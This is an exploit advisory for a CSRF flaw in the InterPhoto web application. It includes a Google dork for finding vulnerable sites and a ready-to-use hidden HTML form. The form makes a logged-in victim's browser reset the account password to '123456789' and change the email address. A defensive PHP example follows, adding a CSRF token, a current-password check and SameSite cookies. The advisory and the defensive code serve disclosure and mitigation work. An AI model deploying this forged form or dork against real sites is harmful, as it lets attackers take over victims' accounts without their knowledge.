InterPhoto CSRF Vulnerability

2016.02.11
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : InterPhoto CSRF Vulnerability
[+]
[+] Exploit Author : Und3rgr0unD security team
[+]
[+] Google Dork : inurl:interphoto?id=
[+]
[+] Vendor Homepage: http://www.interphoto.es/
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Code:
-->
<form method="post" action="http://localhost/mydesk.edit.php">
  <input type="hidden" name="action" value="updateuser" />
  <input type="hidden" name="password" value="123456789" />
  <input type="hidden" name="repassword" value="123456789" />
  <input type="hidden" name="email" value="email@x.com" />
  <input type="hidden" name="userfullname" value="" />
  <input type="hidden" name="usercompany" value="" />
  <input type="hidden" name="useraddress" value="" />
  <input type="hidden" name="userpostcode" value="" />
  <input type="hidden" name="usertel" value="" />
  <input type="hidden" name="userfax" value="" />
  <input type="hidden" name="useronline" value="" />
  <input type="hidden" name="userwebsite" value="">
  <input type="submit" value="Submit" />
</form>
<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Vulnerable Pages :
[+]
[+] [HOST]/mydesk.edit.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by : bl4ck_mohajem (mohajem.war@gmail.com
[+] Special Thanks : Und3rgr0unD security team
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
-->
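
The form above carries no anti-CSRF token and no current-password field, so the updateuser request depends only on the session cookie the browser sends automatically. The following is an added example of a server-side guard for that action, not InterPhoto's own code; the function names, the `csrf_token` and `current_password` fields, and the use of `password_hash()` for stored passwords are assumptions.

```php
<?php
// Added example: hypothetical guard for the "updateuser" action of mydesk.edit.php.
// Names, session keys and the extra form fields are assumptions, not vendor code.
declare(strict_types=1);

// SameSite=Lax keeps the session cookie off cross-site POSTs in current browsers.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One random token per session; the legitimate edit form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_valid(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Returns the HTTP status the handler should answer with before touching the account.
// $storedHash is the user's password_hash() value (assumed storage format).
function guard_updateuser(string $method, array $post, string $storedHash): int
{
    if ($method !== 'POST' || ($post['action'] ?? '') !== 'updateuser') {
        return 405;
    }
    if (!csrf_valid($post)) {
        return 403; // cross-site form: token missing or wrong
    }
    // A password change additionally requires the current password,
    // which a forged form cannot supply.
    $current = $post['current_password'] ?? '';
    if (($post['password'] ?? '') !== ''
        && !(is_string($current) && password_verify($current, $storedHash))) {
        return 403;
    }
    return 200;
}

// Usage inside the handler (sketch):
//   $status = guard_updateuser($_SERVER['REQUEST_METHOD'], $_POST, $user['password_hash']);
//   if ($status !== 200) { http_response_code($status); exit; }
```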


Copyright 2024, cxsecurity.com

 
